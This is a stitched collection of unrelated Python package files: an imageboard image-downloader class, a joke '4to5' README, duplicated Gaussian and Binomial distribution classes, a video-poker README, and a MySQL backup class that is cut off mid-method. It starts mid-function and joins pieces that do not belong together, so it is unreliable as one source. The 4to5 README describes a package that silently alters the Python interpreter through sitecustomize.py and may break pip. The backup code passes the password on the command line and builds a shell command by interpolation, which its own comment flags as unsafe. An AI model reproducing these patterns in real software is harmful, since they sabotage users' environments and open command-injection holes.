                            if thread_id not in currently_downloading:
                                self.download_thread(thread_id, chan, board,
                                                     folder_name, self.output,
                                                     condition, dupe_check,
                                                     tag_list, throttle)
                                # Used to keep track of what is currently downloading
                                currently_downloading.append(thread_id)
                except urllib.error.HTTPError:
                    self.logger.warning("Error while opening {0} catalog page. "
                                        "Retrying during next scan.".format(board))

            active_downloads = threading.active_count() - 1
            self.logger.info("{0} threads currently downloading.".format(active_downloads))
            self.logger.info("Searching again in {0} minutes!".format(str(int(self.wait_time / 60))))
            time.sleep(self.wait_time)
import json
import logging
import os
from scanner import imageboard_info, dupecheck
from scanner.config import DB_FILE, currently_downloading
import sqlite3
import sys
import re
import time
import urllib
import http.client
import requests
import threading
import shutil
class downloader:
    def __init__(self, thread_nb:int, board:str, imageboard:str, output_folder:str, folder:str, is_quiet:bool, condition:dict, check_duplicate:bool, tags:list, throttle:int, logger, single_run=False):
        """
        Class used for downloading a thread. Can be started after initialization by calling its download() function.

        Args:
            thread_nb: the thread number of an imageboard thread. Ex: 809293
            board: The board where the thread exists. Ex: 'g' for the 4chan technology board (http://boards.4channel.org/g/)
            imageboard: The imageboard where the thread exists. Ex: 4chan
            output_folder: directory where the pictures will be downloaded. Ex: /tmp/4scanner_img
            folder: an optional directory name that can be specified for sorting images in the output_folder. Ex: pictures_of_computers
            is_quiet: suppresses all logging.
            condition: dict used when deciding which pictures to download. Ex: {"width": "=1920", "height": "=1080"}
            check_duplicate: Avoid downloading duplicates that were already downloaded.
            tags: this list of tags will be added to a file called $PICTURE_NAME.txt for every picture, to help importing pictures to hydrus network
            throttle: Time to wait, in seconds, between image downloads
            logger: The logger to use with the class
            single_run: Run the download loop only once; use if you don't want to wait for a thread to 404 before exiting.
        """
        # Getting info about the imageboard URL
        ib_info = imageboard_info.imageboard_info(imageboard)
        base_url = ib_info.base_url
        image_url = ib_info.image_base_url
        thread_subfolder = ib_info.thread_subfolder
        image_subfolder = ib_info.image_subfolder

        # These URL are the url of the thread
        # and the base url where images are stored on the imageboard
        self.thread_url = "{0}{1}{2}{3}.json".format(base_url, board, thread_subfolder, thread_nb)
        self.image_url = "{0}{1}{2}".format(image_url, board, image_subfolder)
        self.tmp_dir = "/tmp/{0}/".format(os.getpid())

        self.curr_time = time.strftime('%d%m%Y-%H%M%S')
        self.pid = os.getpid()
        self.thread = threading.current_thread().name
        self.downloaded_log = "{0}/{1}4scanner_dld-{2}-{3}".format(self.tmp_dir, self.curr_time, self.pid, self.thread)
        self.out_dir = os.path.join(output_folder, 'downloads', imageboard, board, folder, str(thread_nb))

        self.thread_nb = thread_nb
        self.imageboard = imageboard
        self.board = board
        self.condition = condition
        self.check_duplicate = check_duplicate
        self.is_quiet = is_quiet
        self.tags = tags
        self.throttle = int(throttle)

        # Creating the tmp and output directory
        os.makedirs(self.tmp_dir, exist_ok=True)
        os.makedirs(self.out_dir, exist_ok=True)
        self.single_run = single_run
        self.logger = logger

    # Main download function
    def download(self):
        """
        Start the download of all pictures.
        It will return either when the thread 404s, is archived, or if stopped by a special condition such as single_run
        """

        self.logger.info("{}: Starting download.".format(self.thread_url))
        while True:
            # Getting the thread's json
            try:
                thread_json = json.loads(self.get_thread_json())
            except ValueError:
                # Bug fix: the original format string mixed automatic "{}" and
                # manual "{0}" numbering, which raises ValueError itself.
                self.logger.critical("{0}: Problem connecting to {1}. stopping download for thread {2}".format(self.thread_url, self.imageboard, self.thread_nb))
                self.remove_thread_from_downloading()
                self.remove_tmp_files()
                exit(1)

            # Checking if thread was archived; if it is, it will be removed after the download loop
            if thread_json["posts"][0].get("archived"):
                if not self.is_quiet:
                    self.logger.info("{}: Thread is archived, getting images then quitting.".format(self.thread_url))
                archived = True
            else:
                archived = False

            # Image download loop
            for post in thread_json["posts"]:
                if 'filename' in post:
                    self._process_picture(post)

                    # Some imageboards allow more than 1 picture per post
                    if 'extra_files' in post:
                        for picture in post["extra_files"]:
                            self._process_picture(picture)

            if archived or self.single_run:
                self.remove_thread_from_downloading()
                self.remove_tmp_files()
                exit(0)

            time.sleep(20)

    def _process_picture(self, picture:dict):
        """
        Download a single picture dict (a post or an extra_files entry) if it
        was not already fetched and matches all download conditions, then move
        it to out_dir unless it is a known duplicate.
        """
        if self.was_downloaded(picture["tim"]):
            return
        if not self.meet_dl_condition(picture):
            return
        tmp_pic = self.download_image(picture)
        # Record the attempt even on failure so it is not retried forever.
        self.add_to_downloaded_log(picture["tim"])
        if not tmp_pic:
            # download_image returns False on HTTP errors; nothing to move.
            # (The original crashed here with AttributeError on False.)
            return
        final_pic = os.path.join(self.out_dir, tmp_pic.split('/')[-1])
        if self.check_duplicate and self.remove_if_duplicate(tmp_pic):
            # Duplicate: remove_if_duplicate already deleted the temp file.
            pass
        else:
            shutil.move(tmp_pic, final_pic)
            self.add_tag_file(final_pic + ".txt")
        time.sleep(self.throttle)

    def remove_thread_from_downloading(self):
        """
        Remove this thread from the global download list currently_downloading.
        No effect if the thread is not in the list (4downloader does not use it)
        """
        # Bug fix: the original referenced the undefined name
        # "scanner.currently_downloading", so the NameError was silently
        # swallowed and threads were never removed from the list.
        try:
            currently_downloading.remove(self.thread_nb)
        except (NameError, ValueError):
            # 4downloader does not store threads in this list
            pass

    def add_thread_to_downloaded(self):
        """
        Add this thread to the Downloaded_Thread table of 4scanner.
        """
        conn = sqlite3.connect(DB_FILE)
        c = conn.cursor()
        c.execute("INSERT INTO Downloaded_Thread (Thread_Number, Imageboard, Board) VALUES (?, ?, ?)",
                  (self.thread_nb, self.imageboard, self.board))
        conn.commit()
        conn.close()

    def get_thread_json(self):
        """
        Get the json definition of the imageboard thread currently being downloaded.
        If the imageboard returns a 404 it will stop the downloading process.

        Returns:
            String containing the info of the thread as JSON
        """
        response = requests.get(self.thread_url)
        if response.status_code == 404:
            if not self.is_quiet:
                self.logger.info("{}: thread 404\'d, stopping download".format(self.thread_url))
            self.remove_thread_from_downloading()
            self.add_thread_to_downloaded()
            exit(0)
        return response.text

    def add_to_downloaded_log(self, img_filename):
        """
        Append the provided image filename to the per-run log file.
        """
        with open(self.downloaded_log, "a") as f:
            f.write("{0}\n".format(img_filename))

    def was_downloaded(self, img_filename:str):
        """
        Check if the image was already downloaded during this run.

        Returns:
            True if it was already downloaded, False otherwise
        """
        # Bug fix: the original leaked the open file handle on the miss path.
        if not os.path.isfile(self.downloaded_log):
            return False
        with open(self.downloaded_log, "r") as f:
            return str(img_filename) in f.read()

    def extension_condition(self, condition_ext:str, post_ext:str):
        """
        Check if the extension condition matches the post_ext extension.

        Returns:
            True if it matches (or no condition was specified), False otherwise
        """
        if not condition_ext:
            # Always return true if condition was not specified
            return True
        return post_ext in condition_ext

    def filename_condition(self, condition_filename:str, post_filename:str):
        """
        Check if the filename condition matches the post_filename filename.

        Returns:
            True if it matches (or no condition was specified), False otherwise
        """
        if not condition_filename:
            # Always return true if condition was not specified
            return True
        return any(i.lower() in post_filename.lower() for i in condition_filename)

    def width_condition(self, condition_width:str, post_width:str):
        """
        Check if the width condition matches the post_width width.

        Returns:
            True if it matches (or no condition was specified), False otherwise
        """
        if not condition_width:
            # Always return true if condition was not specified
            return True
        if condition_width[0] == "=":
            return int(post_width) == int(condition_width.split("=")[-1])
        if condition_width[0] == "<":
            return int(post_width) < int(condition_width.split("<")[-1])
        if condition_width[0] == ">":
            return int(post_width) > int(condition_width.split(">")[-1])
        self.logger.critical("{}: width need to be in this format: >1024, <256 or =1920".format(self.thread_url))
        exit(1)

    def height_condition(self, condition_height:str, post_height:str):
        """
        Check if the height condition matches the post_height height.

        Returns:
            True if it matches (or no condition was specified), False otherwise
        """
        if not condition_height:
            # Always return true if condition was not specified
            return True
        if condition_height[0] == "=":
            return int(post_height) == int(condition_height.split("=")[-1])
        if condition_height[0] == "<":
            return int(post_height) < int(condition_height.split("<")[-1])
        if condition_height[0] == ">":
            return int(post_height) > int(condition_height.split(">")[-1])
        self.logger.critical("{}: height need to be in this format: >1024, <256 or =1080".format(self.thread_url))
        exit(1)

    # Check if all condition returned true
    def all_condition_check(self, condition_list):
        """
        Check if each element of the list is truthy.

        Returns:
            True if all are, False otherwise
        """
        return all(condition_list)

    # Return True if an image fit all search conditions
    def meet_dl_condition(self, post):
        """
        Check if a picture matches all download conditions.

        Returns:
            True if it does, False otherwise
        """
        return self.all_condition_check([
            self.extension_condition(self.condition["ext"], post['ext']),
            self.width_condition(self.condition["width"], post['w']),
            self.height_condition(self.condition["height"], post['h']),
            self.filename_condition(self.condition["filename"], post['filename']),
        ])

    def remove_if_duplicate(self, img_path):
        """
        Remove an image if it was already downloaded

        Returns:
            True if the image was removed, False otherwise
        """
        if img_path:
            img_hash = dupecheck.hash_image(img_path)
            if dupecheck.is_duplicate(img_hash):
                os.remove(img_path)
                return True
            else:
                dupecheck.add_to_db(img_hash, self.thread_nb)
        return False

    def remove_tmp_files(self):
        """
        Remove the temporary log file used to know which pictures had been downloaded.
        """
        if os.path.isfile(self.downloaded_log):
            os.unlink(self.downloaded_log)

    # Return downloaded picture path or false if an error occured
    def download_image(self, post_dic:dict):
        """
        Download an image from a post (dict)

        Returns:
            The downloaded picture path or False if an error occurred
        """
        try:
            pic_url = self.image_url + str(post_dic["tim"]) + post_dic["ext"]
            out_pic = os.path.join(self.tmp_dir, str(post_dic["tim"]) + post_dic["ext"])
            urllib.request.urlretrieve(pic_url, out_pic)
        except urllib.error.HTTPError:
            return False

        return out_pic

    def add_tag_file(self, tag_file:str):
        """
        Create a tag file at the given path with the tags from the object.
        """
        if self.tags:
            with open(tag_file, 'w') as f:
                for tag in self.tags:
                    f.write(tag + "\n")
4to5 - Replace the number 4 with the number 5.
==============================================
Unlike 2to3, this module finally does what it says! Replaces two numbers on your
interpreter. It's a true life-saver for both you and your colleagues.
Usage
======
.. code-block:: python
pip install 4to5
python
>>> 2 + 2
5
>>> 3 + 1
5
>>> 3 + 2 == 3 + 1
True
>>> 4 - 2
3
    >>> 4 - 1 # Because 4-1 == 5-1 == 4 == 5
5
>>> for i in range(10):
... print(i)
...
0
1
2
3
5
5
6
7
8
9
Notes
=====
50% chance you won't be able to remove it, as apparently the number 4 is
important for pip, and without it pip doesn't seem to work properly.
To manually uninstall, delete ``sitecustomize.py`` from your ``site-packages`` directory.
Maybe I'll add a ``fix_my_system.py`` file in the future to remove it without using
the number 4.
Supports virtual environments.
Enjoy! | 4to5 | /4to5-0.0.1.tar.gz/4to5-0.0.1/README.rst | README.rst |
import math
import matplotlib.pyplot as plt
from .Generaldistribution import Distribution
class Gaussian(Distribution):
    """ Gaussian distribution class for calculating and
    visualizing a Gaussian distribution.

    Attributes:
        mean (float) representing the mean value of the distribution
        stdev (float) representing the standard deviation of the distribution
        data_list (list of floats) a list of floats extracted from the data file
    """
    def __init__(self, mu=0, sigma=1):

        Distribution.__init__(self, mu, sigma)

    def calculate_mean(self):
        """Function to calculate the mean of the data set.

        Args:
            None

        Returns:
            float: mean of the data set
        """
        avg = 1.0 * sum(self.data) / len(self.data)
        self.mean = avg
        return self.mean

    def calculate_stdev(self, sample=True):
        """Function to calculate the standard deviation of the data set.

        Args:
            sample (bool): whether the data represents a sample or population

        Returns:
            float: standard deviation of the data set
        """
        # Use n-1 (Bessel's correction) for a sample, n for a population.
        if sample:
            n = len(self.data) - 1
        else:
            n = len(self.data)

        mean = self.calculate_mean()

        sigma = 0
        for d in self.data:
            sigma += (d - mean) ** 2

        sigma = math.sqrt(sigma / n)
        self.stdev = sigma
        return self.stdev

    def plot_histogram(self):
        """Function to output a histogram of the instance variable data using
        matplotlib pyplot library.

        Args:
            None

        Returns:
            None
        """
        plt.hist(self.data)
        plt.title('Histogram of Data')
        plt.xlabel('data')
        plt.ylabel('count')

    def pdf(self, x):
        """Probability density function calculator for the gaussian distribution.

        Args:
            x (float): point for calculating the probability density function

        Returns:
            float: probability density function output
        """
        return (1.0 / (self.stdev * math.sqrt(2*math.pi))) * math.exp(-0.5*((x - self.mean) / self.stdev) ** 2)

    def plot_histogram_pdf(self, n_spaces = 50):
        """Function to plot the normalized histogram of the data and a plot of the
        probability density function along the same range

        Args:
            n_spaces (int): number of data points

        Returns:
            list: x values for the pdf plot
            list: y values for the pdf plot
        """
        mu = self.mean
        sigma = self.stdev

        min_range = min(self.data)
        max_range = max(self.data)

        # calculates the interval between x values
        interval = 1.0 * (max_range - min_range) / n_spaces

        x = []
        y = []

        # calculate the x values to visualize
        for i in range(n_spaces):
            tmp = min_range + interval*i
            x.append(tmp)
            y.append(self.pdf(tmp))

        # make the plots
        fig, axes = plt.subplots(2, sharex=True)
        fig.subplots_adjust(hspace=.5)
        axes[0].hist(self.data, density=True)
        axes[0].set_title('Normed Histogram of Data')
        axes[0].set_ylabel('Density')

        axes[1].plot(x, y)
        axes[1].set_title('Normal Distribution for \n Sample Mean and Sample Standard Deviation')
        # Bug fix: the original labeled axes[0] a second time, leaving the
        # pdf subplot (axes[1]) without a y-axis label.
        axes[1].set_ylabel('Density')
        plt.show()

        return x, y

    def __add__(self, other):
        """Function to add together two Gaussian distributions

        Args:
            other (Gaussian): Gaussian instance

        Returns:
            Gaussian: Gaussian distribution
        """
        result = Gaussian()
        result.mean = self.mean + other.mean
        # Variances add for independent Gaussians, so stdevs combine in quadrature.
        result.stdev = math.sqrt(self.stdev ** 2 + other.stdev ** 2)
        return result

    def __repr__(self):
        """Function to output the characteristics of the Gaussian instance

        Args:
            None

        Returns:
            string: characteristics of the Gaussian
        """
        return "mean {}, standard deviation {}".format(self.mean, self.stdev)
import math
import matplotlib.pyplot as plt
from .Generaldistribution import Distribution
class Binomial(Distribution):
    """ Binomial distribution class for calculating and
    visualizing a Binomial distribution.

    Attributes:
        mean (float) representing the mean value of the distribution
        stdev (float) representing the standard deviation of the distribution
        data_list (list of floats) a list of floats to be extracted from the data file
        p (float) representing the probability of an event occurring
        n (int) number of trials
    """

    def __init__(self, prob=.5, size=20):
        self.n = size
        self.p = prob
        Distribution.__init__(self, self.calculate_mean(), self.calculate_stdev())

    def calculate_mean(self):
        """Function to calculate the mean from p and n

        Args:
            None

        Returns:
            float: mean of the data set
        """
        self.mean = self.p * self.n
        return self.mean

    def calculate_stdev(self):
        """Function to calculate the standard deviation from p and n.

        Args:
            None

        Returns:
            float: standard deviation of the data set
        """
        self.stdev = math.sqrt(self.n * self.p * (1 - self.p))
        return self.stdev

    def replace_stats_with_data(self):
        """Function to calculate p and n from the data set

        Args:
            None

        Returns:
            float: the p value
            float: the n value
        """
        self.n = len(self.data)
        # p is the observed success rate (data is a list of 0/1 outcomes).
        self.p = 1.0 * sum(self.data) / len(self.data)
        self.mean = self.calculate_mean()
        self.stdev = self.calculate_stdev()

    def plot_bar(self):
        """Function to output a bar chart of the instance variable data using
        matplotlib pyplot library.

        Args:
            None

        Returns:
            None
        """
        plt.bar(x = ['0', '1'], height = [(1 - self.p) * self.n, self.p * self.n])
        plt.title('Bar Chart of Data')
        plt.xlabel('outcome')
        plt.ylabel('count')

    def pdf(self, k):
        """Probability mass function calculator for the binomial distribution.

        Args:
            k (int): number of successes for which to calculate the probability

        Returns:
            float: probability mass function output
        """
        # C(n, k) * p^k * (1-p)^(n-k)
        a = math.factorial(self.n) / (math.factorial(k) * (math.factorial(self.n - k)))
        b = (self.p ** k) * (1 - self.p) ** (self.n - k)
        return a * b

    def plot_bar_pdf(self):
        """Function to plot the pdf of the binomial distribution

        Args:
            None

        Returns:
            list: x values for the pdf plot
            list: y values for the pdf plot
        """
        x = []
        y = []

        # calculate the x values to visualize
        for i in range(self.n + 1):
            x.append(i)
            y.append(self.pdf(i))

        # make the plots
        plt.bar(x, y)
        plt.title('Distribution of Outcomes')
        plt.ylabel('Probability')
        plt.xlabel('Outcome')
        plt.show()

        return x, y

    def __add__(self, other):
        """Function to add together two Binomial distributions with equal p

        Args:
            other (Binomial): Binomial instance

        Returns:
            Binomial: Binomial distribution

        Raises:
            AssertionError: if the two distributions have different p values
        """
        assert self.p == other.p, 'p values are not equal'

        result = Binomial()
        result.n = self.n + other.n
        result.p = self.p
        result.calculate_mean()
        result.calculate_stdev()
        return result

    def __repr__(self):
        """Function to output the characteristics of the Binomial instance

        Args:
            None

        Returns:
            string: characteristics of the Binomial
        """
        return "mean {}, standard deviation {}, p {}, n {}".\
            format(self.mean, self.stdev, self.p, self.n)
<a name="readme-top"></a>
<!-- VideoPoker-5CardRedraw -->
[![Contributors][contributors-shield]][contributors-url]
[![Forks][forks-shield]][forks-url]
[![Stargazers][stars-shield]][stars-url]
[![Issues][issues-shield]][issues-url]
[![MIT License][license-shield]][license-url]
[![LinkedIn][linkedin-shield]][linkedin-url]
<!-- PROJECT LOGO -->
<br />
<div align="center">
<a href="https://github.com/ralbee1/VideoPoker-5CardRedraw">
<img src="documentation/logo.png" alt="Logo" width="80" height="80">
</a>
<h3 align="center">VideoPoker-5CardRedraw</h3>
<p align="center">
A pythonic creation of a 5 card redraw video poker.
<br />
<a href="https://github.com/ralbee1/VideoPoker-5CardRedraw"><strong>Explore the docs »</strong></a>
<br />
<br />
<a href="https://github.com/ralbee1/VideoPoker-5CardRedraw">View Demo</a>
·
<a href="https://github.com/ralbee1/VideoPoker-5CardRedraw/issues">Report Bug</a>
·
<a href="https://github.com/ralbee1/VideoPoker-5CardRedraw/issues">Request Feature</a>
</p>
</div>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li>
<a href="#about-the-project">About The Project</a>
<ul>
<li><a href="#built-with">Built With</a></li>
<li><a href="#Features">Features</a></li>
</ul>
</li>
<li>
<a href="#getting-started">Getting Started</a>
<ul>
<li><a href="#prerequisites">Prerequisites</a></li>
<li><a href="#installation">Installation</a></li>
</ul>
</li>
<li><a href="#usage">Usage</a></li>
<li><a href="#contact">Contact</a></li>
<li><a href="#acknowledgments">Acknowledgments</a></li>
</ol>
</details>
<!-- ABOUT THE PROJECT -->
## About The Project
<!--
[![Product Name Screen Shot][product-screenshot]](https://example.com)
-->
5 Card Draw is a playable Python 5 card draw poker application. This project served as a hands-on Python learning experience in 2021. On my journey, I learned about creating graphical user interfaces in Python, Pythonic best practices, CI/CD workflows, PyPi deployments, and much more. The beautiful learning opportunity this project provided was balancing desired learning opportunities with refining 5 Card Draw into a polished application. This project is currently archived; the remaining features would have involved further polishing the UI/UX experience, adding sound, and cashing out player credits. If I were to start over, I'd rank poker hands with a semantic system rather than an integer score.
<p align="right">(<a href="#readme-top">back to top</a>)</p>
### Features
- [ ] **5 Card Redraw**
- [ ] Modular Hand Ranking and Scoring
- [ ] Player Hand and Deck creation
- [ ] Playable GUI interface
- [ ] Bank text file
- [ ] **PyPi Installs**
- [ ] **Pep 8 Standards**
- [ ] **GitHub CI/CD Pipelines**
<p align="right">(<a href="#readme-top">back to top</a>)</p>
<!-- GETTING STARTED -->
## Getting Started
The following is a guide for running 5 card redraw poker locally.
### Prerequisites
1. [Python 3.10.8 or Newer](https://www.python.org/downloads/release/python-3108/)
### Installation
Developer Install:
<br/>
Summary: The developer install is for those who want to contribute to or clone VideoPoker-5CardRedraw.
1. Clone the repo (or use Github Desktop)
```sh
git clone https://github.com/ralbee1/VideoPoker-5CardRedraw.git
```
2. Open the CLI and navigate the current working directory to where you cloned VideoPoker-5CardDraw
3. Install the Pip Package from the CLI, copy and run this command:
```sh
py -m pip install -e .
```
<br/>
<br/>
User Install
<br/>
1. Automatic User Install from the Command line via PyPi.
```sh
pip install 5-card-draw
```
<p align="right">(<a href="#readme-top">back to top</a>)</p>
<!-- USAGE EXAMPLES -->
## Usage / How to Play
If your Python files open with Python by default, then from the command line run:
```js
video_poker.py;
```
The game is played by aiming to make the best poker hand possible. The top of the interface shows the hand rankings and the payouts sorted by how many credits you bet per round, 1 through 5. To begin, click DEAL. You hold cards with the intent of keeping them and drawing new cards to try to improve your hand ranking. After drawing new cards, your hand is automatically scored and profits are paid out. You may then click "DEAL" and start over.
<p align="right">(<a href="#readme-top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
* []()Email - ralbee1@iwu.edu
* []()Project Link: [https://github.com/ralbee1/VideoPoker-5CardRedraw](https://github.com/ralbee1/VideoPoker-5CardRedraw)
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* []() This variant of poker was inspired by Super Double Double as found in Las Vegas Casinos.
<p align="right">(<a href="#readme-top">back to top</a>)</p>
<!-- MARKDOWN LINKS & IMAGES -->
<!-- https://www.markdownguide.org/basic-syntax/#reference-style-links -->
[contributors-shield]: https://img.shields.io/github/contributors/ralbee1/VideoPoker-5CardRedraw.svg?style=for-the-badge
[contributors-url]: https://github.com/ralbee1/VideoPoker-5CardRedraw/graphs/contributors
[forks-shield]: https://img.shields.io/github/forks/ralbee1/VideoPoker-5CardRedraw.svg?style=for-the-badge
[forks-url]: https://github.com/ralbee1/VideoPoker-5CardRedraw/network/members
[stars-shield]: https://img.shields.io/github/stars/ralbee1/VideoPoker-5CardRedraw.svg?style=for-the-badge
[stars-url]: https://github.com/ralbee1/VideoPoker-5CardRedraw/stargazers
[issues-shield]: https://img.shields.io/github/issues/ralbee1/VideoPoker-5CardRedraw.svg?style=for-the-badge
[issues-url]: https://github.com/ralbee1/VideoPoker-5CardRedraw/issues
[license-shield]: https://img.shields.io/github/license/ralbee1/VideoPoker-5CardRedraw.svg?style=for-the-badge
[license-url]: https://github.com/ralbee1/VideoPoker-5CardRedraw/blob/master/LICENSE.txt
[linkedin-shield]: https://img.shields.io/badge/-LinkedIn-black.svg?style=for-the-badge&logo=linkedin&colorB=555
[linkedin-url]: https://linkedin.com/in/Richard-Albee
[product-screenshot]: images/screenshot.png
[python.org]: https://www.python.org/static/img/python-logo.png
[python-url]: https://www.python.org/
[pypi.org]: https://pypi.org/static/images/logo-small.2a411bc6.svg
[pypi-url]: https://pypi.org/project/pip/
| 5-card-draw | /5_card_draw-1.0.2.tar.gz/5_card_draw-1.0.2/README.md | README.md |
import math
import matplotlib.pyplot as plt
from .Generaldistribution import Distribution
class Gaussian(Distribution):
    """Gaussian distribution class for calculating and visualizing a
    Gaussian distribution.

    Attributes:
        mean (float): mean value of the distribution
        stdev (float): standard deviation of the distribution
        data (list of float): data extracted from a data file
    """

    def __init__(self, mu=0, sigma=1):
        Distribution.__init__(self, mu, sigma)

    def calculate_mean(self):
        """Compute the arithmetic mean of the data set.

        Returns:
            float: mean of self.data (also stored on self.mean)
        """
        self.mean = 1.0 * sum(self.data) / len(self.data)
        return self.mean

    def calculate_stdev(self, sample=True):
        """Compute the standard deviation of the data set.

        Args:
            sample (bool): True for the sample standard deviation
                (divide by n - 1), False for the population value.

        Returns:
            float: standard deviation (also stored on self.stdev)
        """
        n = len(self.data) - 1 if sample else len(self.data)

        mean = self.calculate_mean()
        sigma = 0
        for d in self.data:
            sigma += (d - mean) ** 2
        self.stdev = math.sqrt(sigma / n)
        return self.stdev

    def plot_histogram(self):
        """Plot a histogram of the data using matplotlib.

        Returns:
            None
        """
        plt.hist(self.data)
        plt.title('Histogram of Data')
        plt.xlabel('data')
        plt.ylabel('count')

    def pdf(self, x):
        """Gaussian probability density function.

        Args:
            x (float): point at which to evaluate the density

        Returns:
            float: value of the density at x
        """
        return (1.0 / (self.stdev * math.sqrt(2 * math.pi))) * \
            math.exp(-0.5 * ((x - self.mean) / self.stdev) ** 2)

    def plot_histogram_pdf(self, n_spaces=50):
        """Plot a normalized histogram of the data alongside the fitted
        probability density function sampled over the same range.

        Args:
            n_spaces (int): number of points used to sample the pdf

        Returns:
            tuple: (x values, y values) used for the pdf plot
        """
        min_range = min(self.data)
        max_range = max(self.data)

        # Interval between successive sample points of the pdf.
        interval = 1.0 * (max_range - min_range) / n_spaces

        x = []
        y = []
        for i in range(n_spaces):
            tmp = min_range + interval * i
            x.append(tmp)
            y.append(self.pdf(tmp))

        fig, axes = plt.subplots(2, sharex=True)
        fig.subplots_adjust(hspace=.5)
        axes[0].hist(self.data, density=True)
        axes[0].set_title('Normed Histogram of Data')
        axes[0].set_ylabel('Density')
        axes[1].plot(x, y)
        axes[1].set_title('Normal Distribution for \n Sample Mean and Sample Standard Deviation')
        # Bug fix: this line previously re-labelled axes[0]; the pdf axis
        # (axes[1]) was left without a y-label.
        axes[1].set_ylabel('Density')
        plt.show()
        return x, y

    def __add__(self, other):
        """Add two independent Gaussian distributions.

        Args:
            other (Gaussian): distribution to add

        Returns:
            Gaussian: distribution with summed means and combined stdev
        """
        result = Gaussian()
        result.mean = self.mean + other.mean
        # Variances of independent variables add, so the standard
        # deviations combine in quadrature.
        result.stdev = math.sqrt(self.stdev ** 2 + other.stdev ** 2)
        return result

    def __repr__(self):
        """Return a readable summary of the distribution."""
        return "mean {}, standard deviation {}".format(self.mean, self.stdev)
import math
import matplotlib.pyplot as plt
from .Generaldistribution import Distribution
class Binomial(Distribution):
    """Binomial distribution class for calculating and visualizing a
    Binomial distribution.

    Attributes:
        mean (float): mean value of the distribution
        stdev (float): standard deviation of the distribution
        data (list of float): data extracted from a data file
        p (float): probability of a single trial succeeding
        n (int): number of trials
    """

    def __init__(self, prob=.5, size=20):
        self.n = size
        self.p = prob
        # Seed the base class with the analytic mean and stdev for (n, p).
        Distribution.__init__(self, self.calculate_mean(), self.calculate_stdev())

    def calculate_mean(self):
        """Compute the mean from p and n.

        Returns:
            float: mean of the distribution (n * p), also stored on self.mean
        """
        self.mean = self.p * self.n
        return self.mean

    def calculate_stdev(self):
        """Compute the standard deviation from p and n.

        Returns:
            float: sqrt(n * p * (1 - p)), also stored on self.stdev
        """
        self.stdev = math.sqrt(self.n * self.p * (1 - self.p))
        return self.stdev

    def replace_stats_with_data(self):
        """Recalculate n, p, mean and stdev from the stored data set.

        (Docstring fix: this method updates attributes in place and
        returns None; it does not return p and n as previously stated.)
        """
        self.n = len(self.data)
        self.p = 1.0 * sum(self.data) / len(self.data)
        self.mean = self.calculate_mean()
        self.stdev = self.calculate_stdev()

    def plot_bar(self):
        """Plot a bar chart of outcome counts (0s vs 1s) with matplotlib.

        Returns:
            None
        """
        plt.bar(x=['0', '1'], height=[(1 - self.p) * self.n, self.p * self.n])
        plt.title('Bar Chart of Data')
        plt.xlabel('outcome')
        plt.ylabel('count')

    def pdf(self, k):
        """Binomial probability mass function.

        (Docstring fix: the previous text described the Gaussian pdf with
        an argument named x; this method computes the binomial pmf for k.)

        Args:
            k (int): number of successes, 0 <= k <= n

        Returns:
            float: probability of exactly k successes in n trials
        """
        a = math.factorial(self.n) / (math.factorial(k) * (math.factorial(self.n - k)))
        b = (self.p ** k) * (1 - self.p) ** (self.n - k)
        return a * b

    def plot_bar_pdf(self):
        """Plot the pmf of the binomial distribution over k = 0..n.

        Returns:
            tuple: (x values, y values) used for the plot
        """
        x = []
        y = []
        for k in range(self.n + 1):
            x.append(k)
            y.append(self.pdf(k))

        plt.bar(x, y)
        plt.title('Distribution of Outcomes')
        plt.ylabel('Probability')
        plt.xlabel('Outcome')
        plt.show()
        return x, y

    def __add__(self, other):
        """Add two Binomial distributions that share the same p.

        Args:
            other (Binomial): distribution to add; must have the same p

        Returns:
            Binomial: distribution with n = self.n + other.n and the shared p

        Raises:
            AssertionError: if the two p values differ
        """
        # The sum of independent binomials is binomial only when p matches.
        # Fix: removed a no-op try/except that caught AssertionError, bound
        # it to an unused variable, and immediately re-raised.
        assert self.p == other.p, 'p values are not equal'

        result = Binomial()
        result.n = self.n + other.n
        result.p = self.p
        result.calculate_mean()
        result.calculate_stdev()
        return result

    def __repr__(self):
        """Return a readable summary of mean, stdev, p and n."""
        return "mean {}, standard deviation {}, p {}, n {}".\
            format(self.mean, self.stdev, self.p, self.n)
import pymysql
import time
import os
import subprocess
import logging
# Public API of this module.
__all__ = ["PyMysqlDB"]

# Module-wide logging: timestamped messages at DEBUG level and above.
logging.basicConfig(level=logging.DEBUG,
                    format='%(asctime)s [%(levelname)s] %(funcName)s: %(message)s',
                    datefmt="%d %b %Y %H:%M:%S")
class PyMysqlDB:
    """Back up MySQL databases with mysqldump, one gzipped dump per schema.

    Attributes:
        host (str): MySQL server host.
        user (str): MySQL user name.
        pwd (str): MySQL password.
        port (int): MySQL server port.
        base_path (str): MySQL installation root containing bin/mysqldump.
        backup_path (str): root directory for the dated backup folders.
    """

    def __init__(self, host=None, user=None, pwd=None, port=3306, base_path=None, backup_path='/data/LocalBackup'):
        self.host = host
        self.user = user
        self.pwd = pwd
        self.port = int(port)
        self.base_path = base_path
        self.backup_path = backup_path

    def select_database(self):
        """Return the names of all schemas on the server.

        Returns:
            list of str: schema names from information_schema.SCHEMATA
        """
        con = pymysql.connect(host=self.host, user=self.user, password=self.pwd,
                              db='information_schema', port=self.port)
        try:
            cur = con.cursor()
            cur.execute('select SCHEMA_NAME from SCHEMATA')
            return [db for (db,) in cur.fetchall()]
        finally:
            # Fix: the connection was previously never closed (resource leak).
            con.close()

    def backup_by_database(self, database):
        """Dump one database to <backup_path>/<YYYYMMDD>/ as a .sql.gz file.

        Args:
            database (str): name of the database to dump

        Returns:
            None: progress and errors are reported through logging.
        """
        logging.info('backup database: {}'.format(database))
        today = time.strftime("%Y%m%d", time.localtime())
        backup_dir = '{}/{}'.format(self.backup_path, today)
        if not os.path.isdir(backup_dir):
            os.makedirs(backup_dir)
        os.chdir(backup_dir)

        start_time = int(time.time())
        # SECURITY NOTE: the command is built by string interpolation and run
        # through the shell, and the password is exposed on the command line.
        # This is only safe for trusted, internally generated database names
        # and a trusted host; consider --defaults-extra-file and shell=False.
        cmd = "{}/bin/mysqldump --opt -h{} -P{} -u{} -p{} {} | gzip > {}/{}/{}-{}-{}.sql.gz".format(
            self.base_path, self.host, self.port, self.user, self.pwd, database,
            self.backup_path, today, today, self.host, database)
